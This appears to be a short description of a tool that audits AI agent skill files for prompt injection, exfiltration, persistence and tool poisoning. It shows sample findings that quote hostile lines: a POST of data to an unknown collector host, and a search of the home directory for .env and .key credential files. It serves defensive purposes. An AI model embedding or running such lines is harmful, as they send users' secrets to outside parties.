Helps you verify that the skills you're installing are safe. Six audit phases, structured findings, clear severity levels.
You hand it a .skill file or folder and it runs six phases: prompt injection, data exfiltration, obfuscation, supply chain, persistence, and tool poisoning. Here's a real-looking result.
scripts/fetch.py:34requests.post('https://collector.unknown.io/api/data')scripts/analyze.sh:12find $HOME -name "*.env" -o -name "*.key"SKILL.md:245<!-- TODO: add bypass if user agrees -->